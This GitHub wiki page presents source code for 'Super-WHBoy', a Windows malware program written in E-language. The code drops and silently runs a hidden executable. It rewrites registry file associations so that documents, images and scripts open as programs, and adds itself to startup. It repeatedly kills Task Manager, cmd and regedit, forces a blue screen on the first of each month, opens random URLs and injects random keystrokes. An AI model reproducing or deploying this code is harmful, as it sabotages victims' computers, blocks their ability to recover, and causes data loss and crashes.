Code - YarnXian/Super-WHBoy GitHub Wiki

Main.e

Window assembly:

.版本 2
.支持库 eAPI
.程序集 窗口程序集_启动窗口
.子程序 __启动窗口_创建完毕
' 重启资源管理器
终止进程 (“explorer.exe”)
运行 (“explorer”, 假, #隐藏窗口)
' 释放病毒文件
写到文件 (“C:\icon.ico”, #icon)
写到文件 (“C:\wrom.exe”, #wrom)
写到文件 (“C:\img.bmp”, #img)
置文件属性 (“C:\wrom.exe”, #隐藏文件)
运行 (“C:\wrom.exe”, 假, )
' 修改注册表
写注册项 (#根类, “.lnk\”, “exefile”)
写注册项 (#根类, “.doc\”, “exefile”)
写注册项 (#根类, “.docx\”, “exefile”)
写注册项 (#根类, “.ppt\”, “exefile”)
写注册项 (#根类, “.pptx\”, “exefile”)
写注册项 (#根类, “.xls\”, “exefile”)
写注册项 (#根类, “.xlsx\”, “exefile”)
写注册项 (#根类, “.png\”, “exefile”)
设置桌面墙纸 (“C:\img.bmp”, 2)
' 文件关联2
写注册项 (#根类, “.jpg\”, “exefile”)
写注册项 (#根类, “.jpeg\”, “exefile”)
写注册项 (#根类, “.bmp\”, “exefile”)
写注册项 (#根类, “.com\”, “exefile”)
写注册项 (#根类, “.mp3\”, “exefile”)
写注册项 (#根类, “.mp4\”, “exefile”)
写注册项 (#根类, “.avi\”, “exefile”)
写注册项 (#根类, “.mp5\”, “exefile”)
写注册项 (#根类, “.txt\”, “exefile”)
写注册项 (#根类, “.bat\”, “exefile”)
写注册项 (#根类, “.cmd\”, “exefile”)
写注册项 (#根类, “.vbs\”, “exefile”)
写注册项 (#根类, “.java\”, “exefile”)
写注册项 (#根类, “.cpp\”, “exefile”)
写注册项 (#根类, “exefile\DefaultIcon\”, “C:\icon.ico”)
' 开机自启动
写注册项 (#本地机器, “software\microsoft\windows\CurrentVersion\Run\wrom”, “C:\wrom.exe”)
' 重启资源管理器
终止进程 (“explorer.exe”)
运行 (“explorer”, 假, #隐藏窗口)
信息框 (“Oh?”, 0, “Super WHBoy”, )
.子程序 _数值增加_周期事件
BoxNumber = BoxNumber + 1
.子程序 _自我防护_周期事件
终止进程 (“taskmgr.exe”)
终止进程 (“cmd.exe”)
终止进程 (“regedit.exe”)

Picture&Program res

.版本 2
.图片 icon
.图片 wrom
.图片 img

Self Starting.e

.版本 2
.子程序 _变卡_周期事件
置随机数种子 ()
超级链接框1.Internet地址 = 到文本 (“www.” + 字符 (取随机数 (1, 100)) + 字符 (取随机数 (1, 100)) + 字符 (取随机数 (1, 100)) + 字符 (取随机数 (1, 100)) + “.com”)
超级链接框1.跳转 ()
BSOD:
.版本 2
.子程序 _时钟1_周期事件
编辑框1.内容 = 到文本 (取现行时间 ())
.判断开始 (寻找文本 (编辑框1.内容, “1日”, , 假) > 0)
系统_蓝屏 ()
Pop up windows and buttons:
.版本 2
.支持库 eAPI
.子程序 _警告弹窗_周期事件
信息框 (“Your computer is poisoned!”, #错误图标, “Super WHBoy”, )
.子程序 _按键事件_周期事件
置随机数种子 ()
.计次循环首 (5, )
模拟按键 (字符 (取随机数 (65, 90)), 字符 (取随机数 (65, 90)), 字符 (取随机数 (65, 90)))
模拟按键 (字符 (取随机数 (65, 90)), 字符 (取随机数 (65, 90)), )
.计次循环尾 ()